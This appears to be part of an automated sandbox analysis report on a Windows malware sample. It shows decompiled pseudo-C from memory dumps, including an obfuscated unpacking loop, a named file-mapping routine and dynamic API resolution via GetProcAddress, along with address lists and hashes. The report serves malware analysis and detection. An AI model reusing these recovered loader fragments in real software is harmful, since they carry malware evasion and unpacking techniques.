                  					 *(_t369 - 0x1c) =  *(_t369 - 0x1c) & 0x00000000;
                  					 *_t376 =  *_t376 + _t155;
                  					_t159 = _t264 + 0x41d34c; // 0x41d34c
                  					 *(_t369 - 0x1c) =  *(_t369 - 0x1c) & 0x00000000;
                  					 *_t376 =  *_t376 + _t159;
                  					_t233 =  *((intOrPtr*)(_t264 + 0x41f064))( *(_t369 - 0x1c),  *(_t369 - 0x1c));
                  				}
                  				 *(_t369 - 0x24) = _t323;
                  				 *((intOrPtr*)(_t264 + 0x41ce46)) = _t233;
                  				_t326 =  *(_t369 - 0x24);
                  				 *(_t369 - 0x1c) = _t326;
                  				_t169 = _t264 + 0x41cb9d; // 0x41cb9d
                  				 *_t376 =  *_t376 - _t363;
                  				 *_t376 =  *_t376 | _t169;
                  				_t170 = _t264 + 0x41cd17; // 0x41cd17
                  				 *(_t369 - 0x20) =  *(_t369 - 0x20) & 0x00000000;
                  				 *_t376 =  *_t376 | _t170;
                  				_t236 =  *((intOrPtr*)(_t264 + 0x41f068))( *(_t369 - 0x20), _t363);
                  				 *_t376 = _t343 & 0x00000000 | _t326 & 0x00000000 ^ _t363;
                  				 *(_t264 + 0x41d015) = 0 ^ _t236;
                  				_t348 = 0;
                  				_t364 = _t363 - 1;
                  				 *(_t369 - 0x1c) = 0;
                  				_push( *(_t369 - 0x1c));
                  				 *_t376 =  *_t376 | _t264;
                  				do {
                  					 *_t178 = _t348;
                  					_t293 =  *(_t369 - 0x20);
                  					_t294 = _t293 &  *(_t369 - 8);
                  					if(_t294 == 0) {
                  						_t364 = _t364 + 1;
                  						_t236 = _t236 & 0x00000000 ^ (_t348 -  *_t376 |  *(_t369 - 0x18));
                  						_t348 = _t348;
                  						_t264 =  *(_t236 + _t364) & 0x000000ff;
                  					}
                  					 *_t184 =  *((intOrPtr*)(_t369 - 0xc));
                  					_t330 =  *(_t369 - 0x20);
                  					asm("rol edx, cl");
                  					asm("lodsb");
                  					_t236 = _t236 | _t330 & _t264;
                  					 *_t348 = _t236;
                  					_t348 = _t348 + 1;
                  					_t186 = _t369 - 4;
                  					 *_t186 =  *((intOrPtr*)(_t369 - 4)) - 1;
                  				} while ( *_t186 != 0);
                  				_t266 =  *_t376;
                  				_t377 =  &(_t376[1]);
                  				_t188 = _t266 + 0x41cc0b; // 0x41cc0b
                  				 *_t377 =  *_t377 & 0x00000000;
                  				 *_t377 =  *_t377 ^ _t188;
                  				_t189 = _t266 + 0x41cbd0; // 0x41cbd0
                  				 *_t377 =  *_t377 & 0x00000000;
                  				 *_t377 =  *_t377 | _t189;
                  				_t240 =  *((intOrPtr*)(_t266 + 0x41f068))(_t369, _t294);
                  				 *(_t369 - 0x20) = _t294;
                  				 *(_t266 + 0x41d326) =  *(_t266 + 0x41d326) & 0x00000000;
                  				 *(_t266 + 0x41d326) =  *(_t266 + 0x41d326) ^ (_t294 ^  *(_t369 - 0x20) | _t240);
                  				 *(_t369 - 0x1c) = _t266;
                  				return memcpy(_t348, _t364 + 1,  *(_t369 - 0x14));
                  			}





























































                  0x030543d8
                  0x030543d8
                  0x030543df
                  0x030543e2
                  0x030543e5
                  0x030543eb
                  0x030543f2
                  0x030543f5
                  0x030543fe
                  0x030543ff
                  0x03054402
                  0x03054405
                  0x03054411
                  0x03054414
                  0x03054417
                  0x0305441e
                  0x0305441f
                  0x03054422
                  0x03054423
                  0x03054430
                  0x03054432
                  0x03054435
                  0x0305443e
                  0x03054442
                  0x0305444c
                  0x03054450
                  0x03054453
                  0x03054453
                  0x0305445b
                  0x03054462
                  0x03054468
                  0x0305446d
                  0x03054473
                  0x0305447c
                  0x0305447f
                  0x03054486
                  0x0305448a
                  0x03054493
                  0x03054494
                  0x03054497
                  0x0305449a
                  0x030544a0
                  0x030544a7
                  0x030544ad
                  0x030544b4
                  0x030544b7
                  0x030544bd
                  0x030544c5
                  0x030544cc
                  0x030544d2
                  0x030544d5
                  0x030544dc
                  0x030544e2
                  0x030544e9
                  0x030544ec
                  0x030544f2
                  0x030544fa
                  0x03054501
                  0x03054507
                  0x0305450a
                  0x03054511
                  0x03054517
                  0x0305451e
                  0x03054521
                  0x03054528
                  0x0305452b
                  0x0305452e
                  0x03054534
                  0x0305453c
                  0x03054543
                  0x03054549
                  0x03054549
                  0x03054551
                  0x03054555
                  0x03054558
                  0x0305455b
                  0x03054562
                  0x03054565
                  0x03054568
                  0x03054571
                  0x03054574
                  0x0305457a
                  0x03054584
                  0x03054587
                  0x03054593
                  0x03054596
                  0x03054599
                  0x030545a0
                  0x030545a1
                  0x030545a4
                  0x030545b2
                  0x030545b4
                  0x030545b7
                  0x030545b9
                  0x030545bf
                  0x030545c9
                  0x030545cc
                  0x030545d2
                  0x030545dc
                  0x030545df
                  0x030545e5
                  0x030545ec
                  0x030545f2
                  0x030545f2
                  0x030545fe
                  0x03054603
                  0x0305460d
                  0x03054611
                  0x03054614
                  0x0305461a
                  0x03054621
                  0x03054624
                  0x0305462b
                  0x0305462e
                  0x03054631
                  0x0305463d
                  0x03054644
                  0x0305464a
                  0x03054654
                  0x03054657
                  0x0305465b
                  0x0305465f
                  0x03054662
                  0x03054668
                  0x03054672
                  0x03054675
                  0x03054681
                  0x03054688
                  0x0305468e
                  0x03054695
                  0x03054698
                  0x030546a1
                  0x030546a5
                  0x030546af
                  0x030546b2
                  0x030546b9
                  0x030546bc
                  0x030546bf
                  0x030546c5
                  0x030546cf
                  0x030546d2
                  0x030546d8
                  0x030546e0
                  0x030546e7
                  0x030546f2
                  0x030546f5
                  0x030546f8
                  0x03054700
                  0x03054704
                  0x0305470a
                  0x03054710
                  0x0305471a
                  0x0305471d
                  0x03054729
                  0x03054730
                  0x03054736
                  0x03054741
                  0x03054743
                  0x03054744
                  0x0305474a
                  0x03054754
                  0x03054757
                  0x0305475d
                  0x03054767
                  0x0305476a
                  0x03054773
                  0x03054776
                  0x03054781
                  0x03054788
                  0x0305478b
                  0x0305478e
                  0x03054791
                  0x03054792
                  0x03054793
                  0x030547a0
                  0x030547a5
                  0x030547a7
                  0x030547ad
                  0x030547b4
                  0x030547b7
                  0x030547bd
                  0x030547c4
                  0x030547c7
                  0x030547c7
                  0x030547cd
                  0x030547d4
                  0x030547da
                  0x030547dd
                  0x030547ed
                  0x030547f4
                  0x030547f7
                  0x030547fa
                  0x03054800
                  0x03054807
                  0x0305480a
                  0x03054812
                  0x03054819
                  0x0305481f
                  0x03054820
                  0x03054821
                  0x03054828
                  0x0305482b
                  0x0305482e
                  0x0305482f
                  0x03054835
                  0x03054836
                  0x03054839
                  0x0305483b
                  0x03054846
                  0x03054848
                  0x03054849
                  0x03054849
                  0x03054850
                  0x03054856
                  0x03054857
                  0x0305485b
                  0x0305485c
                  0x0305485e
                  0x03054860
                  0x03054861
                  0x03054861
                  0x03054861
                  0x03054868
                  0x0305486b
                  0x0305486e
                  0x03054875
                  0x03054879
                  0x0305487c
                  0x03054883
                  0x03054887
                  0x0305488a
                  0x03054890
                  0x03054898
                  0x0305489f
                  0x030548a8
                  0x030548c1

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 950c55eab0a1380bd81bf2ad2fa2bd8a9b0f1be257dd98b9728846acfec3c26f
                  • Instruction ID: 10ad350079f8897aeb1ce84a5229003d0e90aaba3145763cfc44ed8af082d2e6
                  • Opcode Fuzzy Hash: 950c55eab0a1380bd81bf2ad2fa2bd8a9b0f1be257dd98b9728846acfec3c26f
                  • Instruction Fuzzy Hash: C00233728042089FEF04DFA0C88A7EEBBF1FF48310F19856ED889AA145D7385565CF69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b22095e20c329f7d375c50b2b4e61b093e339a4e4c2e62bd3b86910ad18266d0
                  • Instruction ID: 76d494614e89a6e2b60af305745b6e2e331295e5d962d98c4addc767f6cfdffe
                  • Opcode Fuzzy Hash: b22095e20c329f7d375c50b2b4e61b093e339a4e4c2e62bd3b86910ad18266d0
                  • Instruction Fuzzy Hash: 7FC13572844219DFEF04DFA0C8897EEBBF5FF08310F15086DD989AA145D3742664CBAA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d1f32643c1a337532a551df5e7dd1d687da03bae7b11c336c53ee130eebd2aab
                  • Instruction ID: 3b51ff7f7cb879d656fcc0783ba7e4ffbed6dcbbc5c62719c4fdd6a3edcb0ba1
                  • Opcode Fuzzy Hash: d1f32643c1a337532a551df5e7dd1d687da03bae7b11c336c53ee130eebd2aab
                  • Instruction Fuzzy Hash: 1E619533E05618AFEB048FD9DC457AEFBB5EF44720F1581BEE594A3280DBB429108B94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b63c40a153435aee46f1dbaa00f0c7709c3ef757da9a005839b873438a636a49
                  • Instruction ID: 6d325a0d7c27c1ed83d3d36a72a5751fc00f574c10225bf55a8b9c0b73e0eeb6
                  • Opcode Fuzzy Hash: b63c40a153435aee46f1dbaa00f0c7709c3ef757da9a005839b873438a636a49
                  • Instruction Fuzzy Hash: 8351BE73D04504EFEB04DF69D98279EBBB1FF80320F1AC5ADC895A7284CA746A10CB95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cd97c8a2378453d0f50524401d41f85624529e01a0f8e400ad16fc78b9557928
                  • Instruction ID: bca08c3ee653c4d78d909675d3156598195e293f38b7d19df0ea601f8c5dc18b
                  • Opcode Fuzzy Hash: cd97c8a2378453d0f50524401d41f85624529e01a0f8e400ad16fc78b9557928
                  • Instruction Fuzzy Hash: 0E413A72C11604ABEB04CF76CA857DA7BB1EF44330F24C3A9AC399A1D5C3788651AF55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d496aaf9737dd9040203ca25982ef00af11931fa603b3a3eaa8287a0f772126f
                  • Instruction ID: be24b6e250db0c7e0efe62f799529c60a348a7b37de3425e60ae014297d9014c
                  • Opcode Fuzzy Hash: d496aaf9737dd9040203ca25982ef00af11931fa603b3a3eaa8287a0f772126f
                  • Instruction Fuzzy Hash: 34415D72C50618EBEB04CF68C9CA7CA3B70EF04374F288399AC799D1D6D33956519A94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9408914b7e626d52f05bbd282e7e988d0072ea341ec3d82d84db4da1002100f3
                  • Instruction ID: a78d0d5be5ee1b5789568ea75495b026109077c86886598a553d0d2ba355f66b
                  • Opcode Fuzzy Hash: 9408914b7e626d52f05bbd282e7e988d0072ea341ec3d82d84db4da1002100f3
                  • Instruction Fuzzy Hash: DD315C72921A05ABEB04CE78CD853DE7761FF80339F28C75AEC359A2D1D77886518B48
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60262cc59c0515fe76608e882f2625138d0fbd792c4745c0f20dbd6a2c004b33
                  • Instruction ID: 260c70b9dfcdd0372515849c53a7d1a297c81f0d146270af9193f226d03001ae
                  • Opcode Fuzzy Hash: 60262cc59c0515fe76608e882f2625138d0fbd792c4745c0f20dbd6a2c004b33
                  • Instruction Fuzzy Hash: 16319F73921608AFEB04CF78CD8A3DA3B74EF50335F29C365AC298E0D5D37996908A54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f7955dea17897fe3643e446ce251d4f90cae95f15a659bd5de779e5c9b3669b3
                  • Instruction ID: a688235917be5eda7c64c3344f615e6499fb354a0cb86904fdc6ec6e29ded4de
                  • Opcode Fuzzy Hash: f7955dea17897fe3643e446ce251d4f90cae95f15a659bd5de779e5c9b3669b3
                  • Instruction Fuzzy Hash: 6431AD72C10629ABEB04CE39CC8979A7B71EF40770F14C36AAC24994D9C7749660DA98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2d9f2a872924e3946419181a18b576f1bc412e886eb09c29eb84efba224b2e0d
                  • Instruction ID: 19ef1345c77a9fc743ae0eb443150021eccea08807e7806a2daf49c9b651a551
                  • Opcode Fuzzy Hash: 2d9f2a872924e3946419181a18b576f1bc412e886eb09c29eb84efba224b2e0d
                  • Instruction Fuzzy Hash: 173183B3C106059BEB00CE78CD863CA7B74EF50374F298365AD38DE1D5D37986919A94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 377b6065eaa96f6382e610e702929000c340969e1a3c2249ec044ad4b0ffd56c
                  • Instruction ID: 409dd8092a408975f366f10af704eaf7eacdb347d4b10349f49295150d9bc044
                  • Opcode Fuzzy Hash: 377b6065eaa96f6382e610e702929000c340969e1a3c2249ec044ad4b0ffd56c
                  • Instruction Fuzzy Hash: D7317E32890B04EBFB04CF38D9857DA7BB0EF41329F54827AEC199D1DAE37946109A55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E10002154(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                  				intOrPtr _v8;
                  				char _v12;
                  				void* __ebp;
                  				signed int* _t43;
                  				char _t44;
                  				void* _t46;
                  				void* _t49;
                  				intOrPtr* _t53;
                  				void* _t54;
                  				void* _t65;
                  				long _t66;
                  				signed int* _t80;
                  				signed int* _t82;
                  				void* _t84;
                  				signed int _t86;
                  				void* _t89;
                  				void* _t95;
                  				void* _t96;
                  				void* _t99;
                  				void* _t106;
                  
                  				_t43 = _t84;
                  				_t65 = __ebx + 2;
                  				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                  				_t89 = _t95;
                  				_t96 = _t95 - 8;
                  				_push(_t65);
                  				_push(_t84);
                  				_push(_t89);
                  				asm("cld");
                  				_t66 = _a8;
                  				_t44 = _a4;
                  				if(( *(_t44 + 4) & 0x00000006) != 0) {
                  					_push(_t89);
                  					E100022BB(_t66 + 0x10, _t66, 0xffffffff);
                  					_t46 = 1;
                  				} else {
                  					_v12 = _t44;
                  					_v8 = _a12;
                  					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                  					_t86 =  *(_t66 + 0xc);
                  					_t80 =  *(_t66 + 8);
                  					_t49 = E10002375(_t66);
                  					_t99 = _t96 + 4;
                  					if(_t49 == 0) {
                  						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                  						goto L11;
                  					} else {
                  						while(_t86 != 0xffffffff) {
                  							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                  							if(_t53 == 0) {
                  								L8:
                  								_t80 =  *(_t66 + 8);
                  								_t86 = _t80[_t86 + _t86 * 2];
                  								continue;
                  							} else {
                  								_t54 =  *_t53();
                  								_t89 = _t89;
                  								_t86 = _t86;
                  								_t66 = _a8;
                  								_t55 = _t54;
                  								_t106 = _t54;
                  								if(_t106 == 0) {
                  									goto L8;
                  								} else {
                  									if(_t106 < 0) {
                  										_t46 = 0;
                  									} else {
                  										_t82 =  *(_t66 + 8);
                  										E10002260(_t55, _t66);
                  										_t89 = _t66 + 0x10;
                  										E100022BB(_t89, _t66, 0);
                  										_t99 = _t99 + 0xc;
                  										E10002357(_t82[2]);
                  										 *(_t66 + 0xc) =  *_t82;
                  										_t66 = 0;
                  										_t86 = 0;
                  										 *(_t82[2])(1);
                  										goto L8;
                  									}
                  								}
                  							}
                  							goto L13;
                  						}
                  						L11:
                  						_t46 = 1;
                  					}
                  				}
                  				L13:
                  				return _t46;
                  			}























                  0x10002158
                  0x10002159
                  0x1000215a
                  0x1000215d
                  0x1000215f
                  0x10002162
                  0x10002163
                  0x10002165
                  0x10002166
                  0x10002167
                  0x1000216a
                  0x10002174
                  0x10002225
                  0x1000222c
                  0x10002235
                  0x1000217a
                  0x1000217a
                  0x10002180
                  0x10002186
                  0x10002189
                  0x1000218c
                  0x10002190
                  0x10002195
                  0x1000219a
                  0x1000221a
                  0x00000000
                  0x1000219c
                  0x1000219c
                  0x100021a8
                  0x100021aa
                  0x10002205
                  0x10002205
                  0x1000220b
                  0x00000000
                  0x100021ac
                  0x100021bb
                  0x100021bd
                  0x100021be
                  0x100021bf
                  0x100021c2
                  0x100021c2
                  0x100021c4
                  0x00000000
                  0x100021c6
                  0x100021c6
                  0x10002210
                  0x100021c8
                  0x100021c8
                  0x100021cc
                  0x100021d4
                  0x100021d9
                  0x100021de
                  0x100021ea
                  0x100021f2
                  0x100021f9
                  0x100021ff
                  0x10002203
                  0x00000000
                  0x10002203
                  0x100021c6
                  0x100021c4
                  0x00000000
                  0x100021aa
                  0x1000221e
                  0x1000221e
                  0x1000221e
                  0x1000219a
                  0x1000223a
                  0x10002241

                  Memory Dump Source
                  • Source File: 00000000.00000002.605461438.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.605430033.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.605499359.0000000010005000.00000040.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                  • Instruction ID: 9c57574405240a8165450f76d07df83800bb314007ae7cce2d6078ed4837daf0
                  • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                  • Instruction Fuzzy Hash: 6521CB76900204AFD710DFA8CCC09A7F7A5FF49390B468158DD599B249D730FA25CBE0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E1000102F(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                  				intOrPtr _v12;
                  				struct _FILETIME* _v16;
                  				short _v60;
                  				struct _FILETIME* _t14;
                  				intOrPtr _t15;
                  				long _t18;
                  				void* _t22;
                  				intOrPtr _t31;
                  				long _t32;
                  				void* _t34;
                  
                  				_t31 = __edx;
                  				_t14 =  &_v16;
                  				GetSystemTimeAsFileTime(_t14);
                  				_push(0x192);
                  				_push(0x54d38000);
                  				_push(_v12);
                  				_push(_v16);
                  				L10002100();
                  				_push(_t14);
                  				_v16 = _t14;
                  				_t15 =  *0x10004150;
                  				_push(_t15 + 0x1000505e);
                  				_push(_t15 + 0x10005054);
                  				_push(0x16);
                  				_push( &_v60);
                  				_v12 = _t31;
                  				L100020FA();
                  				_t18 = _a4;
                  				if(_t18 == 0) {
                  					_t18 = 0x1000;
                  				}
                  				_t34 = CreateFileMappingW(0xffffffff, 0x10004140, 4, 0, _t18,  &_v60);
                  				if(_t34 == 0) {
                  					_t32 = GetLastError();
                  				} else {
                  					if(_a4 != 0 || GetLastError() == 0xb7) {
                  						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
                  						if(_t22 == 0) {
                  							_t32 = GetLastError();
                  							if(_t32 != 0) {
                  								goto L9;
                  							}
                  						} else {
                  							 *_a8 = _t34;
                  							 *_a12 = _t22;
                  							_t32 = 0;
                  						}
                  					} else {
                  						_t32 = 2;
                  						L9:
                  						CloseHandle(_t34);
                  					}
                  				}
                  				return _t32;
                  			}













                  0x1000102f
                  0x10001038
                  0x1000103c
                  0x10001042
                  0x10001047
                  0x1000104c
                  0x1000104f
                  0x10001052
                  0x10001057
                  0x10001058
                  0x1000105b
                  0x10001066
                  0x1000106d
                  0x10001071
                  0x10001073
                  0x10001074
                  0x10001077
                  0x1000107c
                  0x10001086
                  0x10001088
                  0x10001088
                  0x100010a2
                  0x100010a6
                  0x100010f6
                  0x100010a8
                  0x100010b1
                  0x100010c7
                  0x100010cf
                  0x100010e1
                  0x100010e5
                  0x00000000
                  0x00000000
                  0x100010d1
                  0x100010d4
                  0x100010d9
                  0x100010db
                  0x100010db
                  0x100010bc
                  0x100010be
                  0x100010e7
                  0x100010e8
                  0x100010e8
                  0x100010b1
                  0x100010fe

                  APIs
                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 1000103C
                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001052
                  • _snwprintf.NTDLL ref: 10001077
                  • CreateFileMappingW.KERNEL32(000000FF,10004140,00000004,00000000,?,?), ref: 1000109C
                  • GetLastError.KERNEL32 ref: 100010B3
                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 100010C7
                  • GetLastError.KERNEL32 ref: 100010DF
                  • CloseHandle.KERNEL32(00000000), ref: 100010E8
                  • GetLastError.KERNEL32 ref: 100010F0
                  Memory Dump Source
                  • Source File: 00000000.00000002.605461438.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.605430033.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.605499359.0000000010005000.00000040.00020000.sdmp Download File
                  Similarity
                  • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                  • String ID:
                  • API String ID: 1724014008-0
                  • Opcode ID: 659c6e22773efc5d4acf18c79085ac1006ba0f018220d8c2180b8ead122f5ef9
                  • Instruction ID: fd2cfec1e864bf63db9aaa2ee4e5368c07c46789b5c4626883214d07a46f71c5
                  • Opcode Fuzzy Hash: 659c6e22773efc5d4acf18c79085ac1006ba0f018220d8c2180b8ead122f5ef9
                  • Instruction Fuzzy Hash: 6821CFB2500258BFE721EFA8CCC4EDE77ADEB483D0F118136F615D7159DAB099858BA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E10001A0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                  				intOrPtr _v8;
                  				_Unknown_base(*)()* _t29;
                  				_Unknown_base(*)()* _t33;
                  				_Unknown_base(*)()* _t36;
                  				_Unknown_base(*)()* _t39;
                  				_Unknown_base(*)()* _t42;
                  				intOrPtr _t46;
                  				struct HINSTANCE__* _t50;
                  				intOrPtr _t56;
                  
                  				_t56 = E10001DE1(0x20);
                  				if(_t56 == 0) {
                  					_v8 = 8;
                  				} else {
                  					_t50 = GetModuleHandleA( *0x10004150 + 0x10005014);
                  					_v8 = 0x7f;
                  					_t29 = GetProcAddress(_t50,  *0x10004150 + 0x10005151);
                  					 *(_t56 + 0xc) = _t29;
                  					if(_t29 == 0) {
                  						L8:
                  						E10001DFC(_t56);
                  					} else {
                  						_t33 = GetProcAddress(_t50,  *0x10004150 + 0x10005161);
                  						 *(_t56 + 0x10) = _t33;
                  						if(_t33 == 0) {
                  							goto L8;
                  						} else {
                  							_t36 = GetProcAddress(_t50,  *0x10004150 + 0x10005174);
                  							 *(_t56 + 0x14) = _t36;
                  							if(_t36 == 0) {
                  								goto L8;
                  							} else {
                  								_t39 = GetProcAddress(_t50,  *0x10004150 + 0x10005189);
                  								 *(_t56 + 0x18) = _t39;
                  								if(_t39 == 0) {
                  									goto L8;
                  								} else {
                  									_t42 = GetProcAddress(_t50,  *0x10004150 + 0x1000519f);
                  									 *(_t56 + 0x1c) = _t42;
                  									if(_t42 == 0) {
                  										goto L8;
                  									} else {
                  										 *((intOrPtr*)(_t56 + 8)) = _a8;
                  										 *((intOrPtr*)(_t56 + 4)) = _a4;
                  										_t46 = E10001EB5(_t56, _a12);
                  										_v8 = _t46;
                  										if(_t46 != 0) {
                  											goto L8;
                  										} else {
                  											 *_a16 = _t56;
                  										}
                  									}
                  								}
                  							}
                  						}
                  					}
                  				}
                  				return _v8;
                  			}












                  0x10001a1d
                  0x10001a21
                  0x10001ae2
                  0x10001a27
                  0x10001a3f
                  0x10001a4e
                  0x10001a55
                  0x10001a59
                  0x10001a5c
                  0x10001ada
                  0x10001adb
                  0x10001a5e
                  0x10001a6b
                  0x10001a6f
                  0x10001a72
                  0x00000000
                  0x10001a74
                  0x10001a81
                  0x10001a85
                  0x10001a88
                  0x00000000
                  0x10001a8a
                  0x10001a97
                  0x10001a9b
                  0x10001a9e
                  0x00000000
                  0x10001aa0
                  0x10001aad
                  0x10001ab1
                  0x10001ab4
                  0x00000000
                  0x10001ab6
                  0x10001abc
                  0x10001ac2
                  0x10001ac7
                  0x10001ace
                  0x10001ad1
                  0x00000000
                  0x10001ad3
                  0x10001ad6
                  0x10001ad6
                  0x10001ad1
                  0x10001ab4
                  0x10001a9e
                  0x10001a88
                  0x10001a72
                  0x10001a5c
                  0x10001af0

                  APIs
                    • Part of subcall function 10001DE1: HeapAlloc.KERNEL32(00000000,?,10001556,00000208,00000000,00000000,?,?,?,100016A9,?), ref: 10001DED
                  • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001E4D,?,?,?,?,?,00000002,?,10001401), ref: 10001A33
                  • GetProcAddress.KERNEL32(00000000,?), ref: 10001A55
                  • GetProcAddress.KERNEL32(00000000,?), ref: 10001A6B
                  • GetProcAddress.KERNEL32(00000000,?), ref: 10001A81
                  • GetProcAddress.KERNEL32(00000000,?), ref: 10001A97
                  • GetProcAddress.KERNEL32(00000000,?), ref: 10001AAD
                    • Part of subcall function 10001EB5: memset.NTDLL ref: 10001F34
                  Memory Dump Source
                  • Source File: 00000000.00000002.605461438.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.605430033.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.605499359.0000000010005000.00000040.00020000.sdmp Download File
                  Similarity
                  • API ID: AddressProc$AllocHandleHeapModulememset
                  • String ID:
                  • API String ID: 426539879-0
                  • Opcode ID: 4ec88815e77cd39fd923d72db13d571f8939319d025cdf8bbff59f143bb65112
                  • Instruction ID: 8e690bc40ad544dced62eb57c6a0da5a983291de411777cdb34876cf766fb635
                  • Opcode Fuzzy Hash: 4ec88815e77cd39fd923d72db13d571f8939319d025cdf8bbff59f143bb65112
                  • Instruction Fuzzy Hash: 5F2117B1601B1AAFE750DFA9DC84EDB7BECEF493C07024466E905C7219EB31E9018B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  C-Code - Quality: 75%
                  			E032A5F16(void* __eax, signed int __ebx, void* __ecx, signed int __edx, signed int __esi, signed int _a4) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				void* __edi;
                  				signed int _t610;
                  				void* _t612;
                  				signed int _t613;
                  				intOrPtr _t619;
                  				void* _t626;
                  				void* _t628;
                  				void* _t630;
                  				signed int _t631;
                  				signed int _t633;
                  				signed int _t636;
                  				signed int _t638;
                  				void* _t640;
                  				intOrPtr _t641;
                  				signed int _t644;
                  				void* _t646;
                  				signed int _t647;
                  				signed int _t650;
                  				signed int _t652;
                  				signed int _t653;
                  				intOrPtr _t656;
                  				signed int _t658;
                  				signed int _t661;
                  				signed int _t665;
                  				void* _t667;
                  				signed int _t668;
                  				signed int _t671;
                  				signed int _t675;
                  				signed int _t677;
                  				void* _t679;
                  				signed int _t680;
                  				signed int _t682;
                  				signed int _t684;
                  				signed int _t689;
                  				void* _t691;
                  				signed int _t692;
                  				signed int _t698;
                  				signed int _t701;
                  				signed int _t706;
                  				void* _t708;
                  				intOrPtr _t709;
                  				signed int _t711;
                  				void* _t713;
                  				signed int _t714;
                  				signed int _t717;
                  				intOrPtr _t720;
                  				signed int _t722;
                  				void* _t724;
                  				signed int _t726;
                  				intOrPtr _t729;
                  				void* _t730;
                  				signed int _t733;
                  				void* _t739;
                  				void* _t741;
                  				void* _t742;
                  				signed int _t744;
                  				void* _t746;
                  				signed int _t747;
                  				signed int _t753;
                  				signed int _t756;
                  				signed int _t760;
                  				void* _t762;
                  				signed int _t767;
                  				signed int _t771;
                  				void* _t773;
                  				void* _t775;
                  				void* _t776;
                  				intOrPtr _t778;
                  				signed int _t781;
                  				signed int _t785;
                  				intOrPtr _t788;
                  				signed int _t791;
                  				intOrPtr _t794;
                  				signed int _t797;
                  				signed int _t813;
                  				signed int _t816;
                  				void* _t819;
                  				signed int _t821;
